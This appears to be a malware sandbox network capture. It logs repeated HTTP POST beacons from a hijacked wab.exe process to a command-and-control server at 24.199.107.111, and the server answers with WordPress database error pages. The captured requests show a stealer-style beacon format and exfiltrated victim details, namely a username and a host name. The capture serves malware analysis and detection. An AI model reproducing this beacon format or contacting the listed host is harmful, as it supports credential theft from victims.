                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:33.615601063 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:33.615612030 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              33192.168.2.54975324.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:33.969600916 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:34.132266998 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:34.968250990 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:34 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:34.968275070 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:34.968287945 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              34192.168.2.54975424.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:35.272659063 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:35.435357094 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:36.224514961 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:35 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:36.224539995 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:36.224550009 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              35192.168.2.54975524.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:37.064330101 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:37.227173090 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:38.004230976 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:37 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
